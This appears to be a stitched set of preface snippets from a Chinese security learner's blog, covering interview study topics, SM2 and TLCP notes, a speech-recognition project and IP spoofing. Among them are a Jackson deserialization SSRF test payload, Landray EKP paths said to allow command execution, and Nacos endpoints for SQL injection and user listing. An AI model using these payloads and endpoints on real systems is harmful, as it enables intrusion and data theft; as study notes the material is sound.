0-前言

经过面试学到了如下需要深入学习的技术和扩展的方面，简单记录如下：

1-frida的使用（动态 dump dex） –⑤

​ 2>ida动态调试 –⑥

2-oss存储桶漏洞相关利用

3-SpringBlade微服务框架

4-反序列化框架的学习（未手动找到过这种漏洞，被动扫描出一次，特征：参数为object）

5-双向认证(mTLS) –①

0-前言

​ 抓包抓不到TLCP，记录一下国密相关的内容

主要区别：TLCP四次交互后握手完成；TLS三次交互后握手完成

0-前言

​ 之前认为sm2和RSA的公钥密码体系、sm4和aes的对称分组密码算法、sm3和SHA-256的密码哈希函数这些差不多，后面发现这些在表现效果上虽然差不多，但一些底层原理不一样可能会影响到一部分的应用形式；

​ 例如：sm2基于椭圆曲线离散对数，虽然也是对应两个数，但结果是点与线的对应关系，底层与RSA区别在于，RSA是两个数对应的值；导致的应用效果差别是：RSA密钥长，所以只能加密短数字(密钥)，sm2密钥短，能直接加密请求体

1-反序列化

[1] jackson记录

以目的为导向就是，用[]进行测试判断该参数是否为object类型，是则用ssrf的payload

1

{"test":["javax.swing.JEditorPane", {"page":"http://你的服务ip:8000"}]}	

来测试是否存在jackson的反序列漏洞

1前言

知道存在命令执行的接口大致如下：

1
2
3
4
5

data/sys-common/treexml.tmpl
sys/common/dataxml.jsp
data/sys-common/datajson.js
data/sys-common/treexml.js
ekp/data/sys-common/dataxml.tmpl

前言：

​ 为了便宜行事，可以找语音识别的现成项目进行修改，我最多是一个拼接的应用层，技术算法那些就别花费太多时间了，我只要知道是什么，如何用就成，把高端的科技服务我这种普通人

(–训练200轮，1轮3-5小时，跑了3轮暂时搁置–)

参考项目：https://github.com/yeyupiaoling/PaddlePaddle-DeepSpeech/tree/release/1.0

参考视频：DeepSpeech2实现的中文语音识别_哔哩哔哩_bilibili

可参考项目:https://blog.csdn.net/gitblog_00059/article/details/136961410

以参考项目为例：

1>流程

下载数据集—>数据预处理—>训练模型—>预测模型—>预测方言成文字—>结果

·出现的问题

0.前言

电脑弹出了两个广告，我一看小窗口，没有运行的第三方程序，我根据进程找了一下，发现一个是雷电模拟器的广告，一个是wps的广告，主要是wps的进程明明是手动启动的，但它还是每次自启了，顺便把云服务也带起来自启了，以下记录了完全关闭自启的几种方法，以后换电脑也能记得调。[自动更新服务可以留着，防止对应软件存在漏洞未及时更新]

前言

刚开始认为ip伪造只是简单的更改http请求里面的请求头，后面发现可以更改的地方还是比较多的，记录一下，目前学到的

应用层(HTTP) ：xff等ip请求头伪造 用于伪造ip

网络层/传输层 ：IP 层伪造（Scapy 库构建） 用于反射 / 放大攻击/DDoS / SYN Flood

防御：采用TCP 握手的源 IP【该ip是内核给的】、在路由器上启用RPF检查

1前言

知道泄露接口以及危险接口大致如下：

1
2
3
4
5
6
7
8
9

#文件上传
/nacos/v1/cs/ops/data/removal
#sql注入
/nacos/v1/cs/ops/derby?sql=
#获取nacos版本信息
/nacos/v1/console/server/state
#查看用户信息
GET /nacos/v1/auth/users
.........................

Nacos综合利用工具

看目录查找，内容未制表